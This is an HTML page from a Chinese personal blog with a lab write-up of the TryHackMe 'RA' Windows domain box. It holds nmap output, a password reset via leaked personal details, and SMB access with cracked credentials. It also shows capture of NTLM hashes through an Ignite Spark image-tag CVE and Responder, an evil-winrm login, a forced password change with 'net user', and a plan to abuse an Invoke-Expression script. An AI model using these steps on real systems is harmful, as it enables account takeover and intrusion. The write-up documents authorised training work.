<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
<meta name="google-site-verification" content="LZ0JOjQQZw7PhvjIbZqeOojf3J6807W7DPn6--OTptc" />
<meta name="baidu-site-verification" content="code-DDmcbQ6zQN" />
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <meta name="google-site-verification" content="true">
  <meta name="msvalidate.01" content="true">
  <meta name="yandex-verification" content="true">
  <meta name="baidu-site-verification" content="true">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"noone40404.github.io","root":"/","scheme":"Mist","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":true},"copycode":{"enable":true,"show_result":true,"style":"mac"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":true,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":"gitalk","storage":true,"lazyload":false,"nav":null,"activeClass":"gitalk"},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":5,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="期中考还有体测还有好几个ctf比赛，耽搁了不少时间">
<meta property="og:type" content="article">
<meta property="og:title" content="THM打靶日寄18-RA">
<meta property="og:url" content="http://noone40404.github.io/2024/11/07/THM%E6%89%93%E9%9D%B6%E6%97%A5%E5%AF%8418%EF%BC%9ARA/index.html">
<meta property="og:site_name" content="noone___&#39;s blog">
<meta property="og:description" content="期中考还有体测还有好几个ctf比赛，耽搁了不少时间">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://pic.imgdb.cn/item/672c81c4d29ded1a8cfc6fda.png">
<meta property="og:image" content="https://pic.imgdb.cn/item/672c8164d29ded1a8cfbd9bd.png">
<meta property="og:image" content="https://pic.imgdb.cn/item/672c8211d29ded1a8cfcb938.png">
<meta property="og:image" content="https://pic.imgdb.cn/item/672c83cdd29ded1a8cfe3543.png">
<meta property="og:image" content="https://pic.imgdb.cn/item/672c864bd29ded1a8c002678.png">
<meta property="og:image" content="https://pic.imgdb.cn/item/672c86eed29ded1a8c00eba5.png">
<meta property="og:image" content="https://pic.imgdb.cn/item/672c8aa7d29ded1a8c05bc41.png">
<meta property="og:image" content="https://pic.imgdb.cn/item/672c8c30d29ded1a8c07d4b6.png">
<meta property="og:image" content="https://pic.imgdb.cn/item/672c8d66d29ded1a8c08eae7.png">
<meta property="og:image" content="https://pic.imgdb.cn/item/672daa9ed29ded1a8c026a44.png">
<meta property="og:image" content="https://pic.imgdb.cn/item/672dac23d29ded1a8c0381a8.png">
<meta property="og:image" content="https://pic.imgdb.cn/item/672da830d29ded1a8c002b9a.png">
<meta property="og:image" content="https://pic.imgdb.cn/item/672db204d29ded1a8c084f19.png">
<meta property="og:image" content="https://pic.imgdb.cn/item/672db43ed29ded1a8c0a50c2.png">
<meta property="og:image" content="https://pic.imgdb.cn/item/672dca38d29ded1a8c22091e.png">
<meta property="og:image" content="https://pic.imgdb.cn/item/672dca57d29ded1a8c222bc8.png">
<meta property="og:image" content="https://pic.imgdb.cn/item/672dcfa6d29ded1a8c281205.png">
<meta property="og:image" content="https://pic.imgdb.cn/item/672dcfd9d29ded1a8c285021.png">
<meta property="og:image" content="https://pic.imgdb.cn/item/672dd044d29ded1a8c28e204.png">
<meta property="og:image" content="https://pic.imgdb.cn/item/672dd3d7d29ded1a8c2cb129.png">
<meta property="og:image" content="https://pic.imgdb.cn/item/672dd59bd29ded1a8c2ed702.png">
<meta property="article:published_time" content="2024-11-07T05:10:00.000Z">
<meta property="article:modified_time" content="2024-11-08T09:20:20.671Z">
<meta property="article:author" content="noone___">
<meta property="article:tag" content="THM">
<meta property="article:tag" content="靶场">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://pic.imgdb.cn/item/672c81c4d29ded1a8cfc6fda.png">

<link rel="canonical" href="http://noone40404.github.io/2024/11/07/THM%E6%89%93%E9%9D%B6%E6%97%A5%E5%AF%8418%EF%BC%9ARA/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>THM打靶日寄18-RA | noone___'s blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="noone___'s blog" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">noone___'s blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-sitemap">

    <a href="/sitemap.xml" rel="section"><i class="fa fa-sitemap fa-fw"></i>站点地图</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>
  <a role="button" class="book-mark-link book-mark-link-fixed"></a>

  <a href="https://github.com/noone40404" class="github-corner" title="Follow me on GitHub" aria-label="Follow me on GitHub" rel="noopener" target="_blank"><svg width="80" height="80" viewBox="0 0 250 250" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://noone40404.github.io/2024/11/07/THM%E6%89%93%E9%9D%B6%E6%97%A5%E5%AF%8418%EF%BC%9ARA/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="noone___">
      <meta itemprop="description" content="自闭中">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="noone___'s blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          THM打靶日寄18-RA
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2024-11-07 13:10:00" itemprop="dateCreated datePublished" datetime="2024-11-07T13:10:00+08:00">2024-11-07</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2024-11-08 17:20:20" itemprop="dateModified" datetime="2024-11-08T17:20:20+08:00">2024-11-08</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E6%B8%97%E9%80%8F/" itemprop="url" rel="index"><span itemprop="name">渗透</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
            <div class="post-description">期中考还有体测还有好几个ctf比赛，耽搁了不少时间</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <ul>
<li><p>扫描打点</p>
<p>  开的端口有点太多了，就不截图直接复制了</p>
  <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br></pre></td><td class="code"><pre><span class="line">PORT     STATE SERVICE             VERSION</span><br><span class="line">53/tcp   open  domain?</span><br><span class="line">| fingerprint-strings: </span><br><span class="line">|   DNSVersionBindReqTCP: </span><br><span class="line">|     version</span><br><span class="line">|     bind</span><br><span class="line">|     root-servers</span><br><span class="line">|     nstld</span><br><span class="line">|_    verisign-grs</span><br><span class="line">80/tcp   open  http                Microsoft IIS httpd 10.0</span><br><span class="line">| http-methods: </span><br><span class="line">|_  Potentially risky methods: TRACE</span><br><span class="line">88/tcp   open  kerberos-sec        Microsoft Windows Kerberos (server time: 2024-11-07 08:52:26Z)</span><br><span class="line">135/tcp  open  msrpc               Microsoft Windows RPC</span><br><span class="line">139/tcp  open  netbios-ssn         Microsoft Windows netbios-ssn</span><br><span class="line">389/tcp  open  ldap</span><br><span class="line">443/tcp  open  ssl/https?</span><br><span class="line">| tls-alpn: </span><br><span class="line">|_  http/1.1</span><br><span class="line">| ssl-cert: Subject: commonName=Windows Admin Center</span><br><span class="line">| Subject Alternative Name: DNS:WIN-2FAA40QQ70B</span><br><span class="line">| Not valid before: 2020-04-30T14:41:03</span><br><span class="line">|_Not valid after:  2020-06-30T14:41:02</span><br><span class="line">|_ssl-date: 2024-11-07T08:55:04+00:00; -1s from scanner time.</span><br><span class="line">445/tcp  open  microsoft-ds?</span><br><span class="line">464/tcp  open  kpasswd5?</span><br><span class="line">593/tcp  open  ncacn_http          Microsoft Windows RPC over HTTP 1.0</span><br><span class="line">636/tcp  open  ldapssl?</span><br><span class="line">2179/tcp open  vmrdp?</span><br><span class="line">3268/tcp open  ldap</span><br><span class="line">3269/tcp open  globalcatLDAPssl?</span><br><span class="line">3389/tcp open  ms-wbt-server       Microsoft Terminal Services</span><br><span class="line">|_ssl-date: 2024-11-07T08:55:04+00:00; -1s from scanner time.</span><br><span class="line">| ssl-cert: Subject: commonName=Fire.windcorp.thm</span><br><span class="line">| Not valid before: 2024-11-06T08:43:29</span><br><span class="line">|_Not valid after:  2025-05-08T08:43:29</span><br><span class="line">| rdp-ntlm-info: </span><br><span class="line">|   Target_Name: WINDCORP</span><br><span class="line">|   NetBIOS_Domain_Name: WINDCORP</span><br><span class="line">|   NetBIOS_Computer_Name: FIRE</span><br><span class="line">|   DNS_Domain_Name: windcorp.thm</span><br><span class="line">|   DNS_Computer_Name: Fire.windcorp.thm</span><br><span class="line">|   DNS_Tree_Name: windcorp.thm</span><br><span class="line">|   Product_Version: 10.0.17763</span><br><span class="line">|_  System_Time: 2024-11-07T08:53:49+00:00</span><br><span class="line">5222/tcp open  jabber</span><br><span class="line">|_ssl-date: 2024-11-07T08:55:07+00:00; -1s from scanner time.</span><br><span class="line">| ssl-cert: Subject: commonName=fire.windcorp.thm</span><br><span class="line">| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm</span><br><span class="line">| Not valid before: 2020-05-01T08:39:00</span><br><span class="line">|_Not valid after:  2025-04-30T08:39:00</span><br><span class="line">| xmpp-info: </span><br><span class="line">|   STARTTLS Failed</span><br><span class="line">|   info: </span><br><span class="line">|     xmpp: </span><br><span class="line">|       version: 1.0</span><br><span class="line">|     errors: </span><br><span class="line">|       invalid-namespace</span><br><span class="line">|       (timeout)</span><br><span class="line">|     features: </span><br><span class="line">|     unknown: </span><br><span class="line">|     compression_methods: </span><br><span class="line">|     stream_id: 19qg18wl2w</span><br><span class="line">|     capabilities: </span><br><span class="line">|_    auth_mechanisms: </span><br><span class="line">| fingerprint-strings: </span><br><span class="line">|   RPCCheck: </span><br><span class="line">|_    &lt;stream:error xmlns:stream=&quot;http://etherx.jabber.org/streams&quot;&gt;&lt;not-well-formed xmlns=&quot;urn:ietf:params:xml:ns:xmpp-streams&quot;/&gt;&lt;/stream:error&gt;&lt;/stream:stream&gt;</span><br><span class="line">5269/tcp open  xmpp                Wildfire XMPP Client</span><br><span class="line">| xmpp-info: </span><br><span class="line">|   STARTTLS Failed</span><br><span class="line">|   info: </span><br><span class="line">|     xmpp: </span><br><span class="line">|     errors: </span><br><span class="line">|       (timeout)</span><br><span class="line">|     features: </span><br><span class="line">|     unknown: </span><br><span class="line">|     compression_methods: </span><br><span class="line">|     capabilities: </span><br><span class="line">|_    auth_mechanisms: </span><br><span class="line">7070/tcp open  http                Jetty 9.4.18.v20190429</span><br><span class="line">|_http-server-header: Jetty(9.4.18.v20190429)</span><br><span class="line">|_http-title: Openfire HTTP Binding Service</span><br><span class="line">7443/tcp open  ssl/oracleas-https?</span><br><span class="line">| ssl-cert: Subject: commonName=fire.windcorp.thm</span><br><span class="line">| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm</span><br><span class="line">| Not valid before: 2020-05-01T08:39:00</span><br><span class="line">|_Not valid after:  2025-04-30T08:39:00</span><br><span class="line">7777/tcp open  socks5              (No authentication; connection failed)</span><br><span class="line">| socks-auth-info: </span><br><span class="line">|_  No authentication</span><br><span class="line">9090/tcp open  zeus-admin?</span><br><span class="line">| fingerprint-strings: </span><br><span class="line">|   GetRequest: </span><br><span class="line">|     HTTP/1.1 200 OK</span><br><span class="line">|     Date: Thu, 07 Nov 2024 08:52:26 GMT</span><br><span class="line">|     Last-Modified: Fri, 31 Jan 2020 17:54:10 GMT</span><br><span class="line">|     Content-Type: text/html</span><br><span class="line">|     Accept-Ranges: bytes</span><br><span class="line">|     Content-Length: 115</span><br><span class="line">|     &lt;html&gt;</span><br><span class="line">|     &lt;head&gt;&lt;title&gt;&lt;/title&gt;</span><br><span class="line">|     &lt;meta http-equiv=&quot;refresh&quot; content=&quot;0;URL=index.jsp&quot;&gt;</span><br><span class="line">|     &lt;/head&gt;</span><br><span class="line">|     &lt;body&gt;</span><br><span class="line">|     &lt;/body&gt;</span><br><span class="line">|     &lt;/html&gt;</span><br><span class="line">|   HTTPOptions: </span><br><span class="line">|     HTTP/1.1 200 OK</span><br><span class="line">|     Date: Thu, 07 Nov 2024 08:52:36 GMT</span><br><span class="line">|     Allow: GET,HEAD,POST,OPTIONS</span><br><span class="line">|   JavaRMI, drda, ibm-db2-das, informix: </span><br><span class="line">|     HTTP/1.1 400 Illegal character CNTL=0x0</span><br><span class="line">|     Content-Type: text/html;charset=iso-8859-1</span><br><span class="line">|     Content-Length: 69</span><br><span class="line">|     Connection: close</span><br><span class="line">|     &lt;h1&gt;Bad Message 400&lt;/h1&gt;&lt;pre&gt;reason: Illegal character CNTL=0x0&lt;/pre&gt;</span><br><span class="line">|   SqueezeCenter_CLI: </span><br><span class="line">|     HTTP/1.1 400 No URI</span><br><span class="line">|     Content-Type: text/html;charset=iso-8859-1</span><br><span class="line">|     Content-Length: 49</span><br><span class="line">|     Connection: close</span><br><span class="line">|     &lt;h1&gt;Bad Message 400&lt;/h1&gt;&lt;pre&gt;reason: No URI&lt;/pre&gt;</span><br><span class="line">|   WMSRequest: </span><br><span class="line">|     HTTP/1.1 400 Illegal character CNTL=0x1</span><br><span class="line">|     Content-Type: text/html;charset=iso-8859-1</span><br><span class="line">|     Content-Length: 69</span><br><span class="line">|     Connection: close</span><br><span class="line">|_    &lt;h1&gt;Bad Message 400&lt;/h1&gt;&lt;pre&gt;reason: Illegal character CNTL=0x1&lt;/pre&gt;</span><br><span class="line">9091/tcp open  ssl/xmltec-xmlmail?</span><br><span class="line">| ssl-cert: Subject: commonName=fire.windcorp.thm</span><br><span class="line">| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm</span><br><span class="line">| Not valid before: 2020-05-01T08:39:00</span><br><span class="line">|_Not valid after:  2025-04-30T08:39:00</span><br></pre></td></tr></table></figure>
<ul>
<li><p><code>80</code> 端口：</p>
<p>  首先是看下网站内容，有一堆人的邮箱，不知道有没有用</p>
<p>  <img src="https://pic.imgdb.cn/item/672c81c4d29ded1a8cfc6fda.png" alt=""></p>
<p>  然后去翻源码，找到这个：</p>
<p>  <img src="https://pic.imgdb.cn/item/672c8164d29ded1a8cfbd9bd.png" alt=""></p>
<p>  那么就加到 <code>/etc/hosts</code> 里面再去访问，这里最好顺手把 <code>windcorp.thm</code> 也加进去：</p>
<p>  <img src="https://pic.imgdb.cn/item/672c8211d29ded1a8cfcb938.png" alt=""></p>
<p>  有个密码重置界面但需要密保</p>
<p>  犯病了，这玩意就在网站右上角，不用看源码</p>
<p>  大致扫了一下这两个发现都没啥东西：</p>
<p>  <img src="https://pic.imgdb.cn/item/672c83cdd29ded1a8cfe3543.png" alt=""></p>
<p>  破案了，是主页泄露的个人信息：</p>
<p>  <img src="https://pic.imgdb.cn/item/672c864bd29ded1a8c002678.png" alt=""></p>
<p>  即员工 <code>lilyle</code> 的宠物名 <code>Sparky</code> ，那么去重置密码：</p>
<p>  <img src="https://pic.imgdb.cn/item/672c86eed29ded1a8c00eba5.png" alt=""></p>
<p>  拿到账密 <code>lilyle:ChangeMe#1234</code></p>
</li>
</ul>
</li>
<li><p>拿入口机</p>
<p>  去看一下扫到的端口结果，发现没有 <code>CMS</code> 来给我登录，<code>ssh</code> 也没开</p>
<p>  接下来思路就是找能连上去的地方：</p>
<p>  看到 <code>445</code> 试一下 <code>smb</code> 来连：</p>
<p>  用 <code>enum4linux</code> 直接爆发现被拦截了：</p>
<p>  <img src="https://pic.imgdb.cn/item/672c8aa7d29ded1a8c05bc41.png" alt=""></p>
<p>  那就用 <code>smbmap</code> 加上账密看一下:</p>
  <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">smbmap -u lilyle -p ChangeMe#1234 -R -H windcorp.thm</span><br></pre></td></tr></table></figure>
<p>  <img src="https://pic.imgdb.cn/item/672c8c30d29ded1a8c07d4b6.png" alt=""></p>
<p>  在 <code>Shared</code> 下面找到第一个 <code>flag</code> 和版本信息 <code>spark 2.8.3</code></p>
<p>  <code>smbclient //windcorp.thm/Shared -U lilyle</code> 连上，<code>get</code> 下来：</p>
<p>  <img src="https://pic.imgdb.cn/item/672c8d66d29ded1a8c08eae7.png" alt=""></p>
<p>  顺便把那个 <code>spark</code> 下下来安装一下：</p>
<p>  但是发现超时了：</p>
<p>  <img src="https://pic.imgdb.cn/item/672daa9ed29ded1a8c026a44.png" alt=""></p>
<p>  要用 <code>smbclient //windcorp.thm/Shared -U lilyle -t 500</code> 来延长超时检测时间，大概要等五分钟左右吧：</p>
<p>  <img src="https://pic.imgdb.cn/item/672dac23d29ded1a8c0381a8.png" alt=""></p>
<p>  <del>安装一下</del> 没有jdk8不让安装哈哈</p>
<p>  <a target="_blank" rel="noopener" href="https://www.oracle.com/java/technologies/downloads/">https://www.oracle.com/java/technologies/downloads/</a></p>
<p>  放到 <code>usr/lib/jvm</code> 里面，然后解压一下</p>
<p>  去 <code>~/.zshrc</code> 编辑一下环境变量:</p>
<p>  在末尾加上：</p>
  <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">export JAVA_HOME=/usr/lib/jvm/jdk1.8.0_381</span><br><span class="line">export PATH=$JAVA_HOME/bin:$PATH</span><br></pre></td></tr></table></figure>
<p>  然后可以安装了：</p>
<p>  <code>dpkg-deb -X spark_2_8_3.deb /spark</code></p>
<p>  然后 <code>java</code> 环境又出问题了，但电脑快没没电了，就先跳过这里：</p>
<p>  发现是 <code>Ignite Realtime Spark</code> ，直接搜到 <code>CVE</code> :</p>
<p>  <img src="https://pic.imgdb.cn/item/672da830d29ded1a8c002b9a.png" alt=""></p>
<p>  这个漏洞允许在向对方用户以 <code>&lt;img src=[external_ip]/test.img&gt;</code> 的格式发送图片时，通过 <code>response</code> 拿到对话用户的密码 <code>hash</code> 值</p>
<p>  先在本机开一个 <code>responder</code> 来收 <code>hash</code> ：</p>
  <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">responder -I tun0</span><br></pre></td></tr></table></figure>
<p>  然后去软件里面登录刚刚的账密，随便挑一个人发消息：</p>
<p>  <img src="https://pic.imgdb.cn/item/672db204d29ded1a8c084f19.png" alt=""></p>
<p>  在 <code>responder</code> 里面收到 <code>hash</code> ，用 <code>john</code> 爆破一下得到账密：</p>
<p>  <code>buse:uzunLM+3131</code></p>
<p>  然后不会了，看 <code>wp</code> ：</p>
<p>  发现还是扫描的问题，端口没扫全啊嗯</p>
  <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap --min-rate 10000 -p- 10.10.136.0</span><br></pre></td></tr></table></figure>
<p>  <img src="https://pic.imgdb.cn/item/672db43ed29ded1a8c0a50c2.png" alt=""></p>
<p>  这里，应该注意到 <code>5985</code> 端口，该端口运行着 <code>win-rm</code> 服务</p>
<p>  那么可以使用 <code>evil-winrm</code> 来连接：</p>
  <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">evil-winrm -i windcorp.thm -u buse -p uzunLM+3131</span><br></pre></td></tr></table></figure>
<p>  <img src="https://pic.imgdb.cn/item/672dca38d29ded1a8c22091e.png" alt=""></p>
<p>  发力了啊嗯，转到 <code>attackbox</code></p>
<p>  <img src="https://pic.imgdb.cn/item/672dca57d29ded1a8c222bc8.png" alt=""></p>
<p>  在当前用户的桌面找到 <code>Flag 2</code></p>
</li>
<li><p><code>Windows</code> 提权</p>
<p>  <del>不会，偷看wp</del></p>
<p>  先去看一下用户组权限：</p>
<p>  <img src="https://pic.imgdb.cn/item/672dcfa6d29ded1a8c281205.png" alt=""></p>
<p>  去看下官方文档，发现不能更改管理员用户权限：</p>
<p>  <img src="https://pic.imgdb.cn/item/672dcfd9d29ded1a8c285021.png" alt=""></p>
<p>  然后去 <code>C:\script</code> 找到一个 <code>powershell</code> 脚本</p>
<p>  <img src="https://pic.imgdb.cn/item/672dd044d29ded1a8c28e204.png" alt=""></p>
<p>  具体内容是读取 <code>C:\Users\brittanycr\hosts.txt</code> 每一行并通过 <code>Invoke-Expression</code> 执行</p>
<p>  所以可以尝试修改其中内容来进行命令执行，但当前用户显然没有权限更改别人目录下的 <code>hosts.txt</code></p>
<p>  但有权限更改别人的密码（</p>
  <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net user brittanycr &#x27;qwq2501###&#x27;</span><br></pre></td></tr></table></figure>
<p>  <img src="https://pic.imgdb.cn/item/672dd3d7d29ded1a8c2cb129.png" alt=""></p>
<p>  拿到账密 <code>brittanycr:qwq2501###</code></p>
<p>  但令人感慨的是连不上这个用户，只能用 <code>smb</code> 再试试：</p>
  <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">smbclient //windcorp.thm/Users -U brittanycr</span><br></pre></td></tr></table></figure>
<p>  然后本地写个新的 <code>hosts.txt</code> <code>push</code> 上去</p>
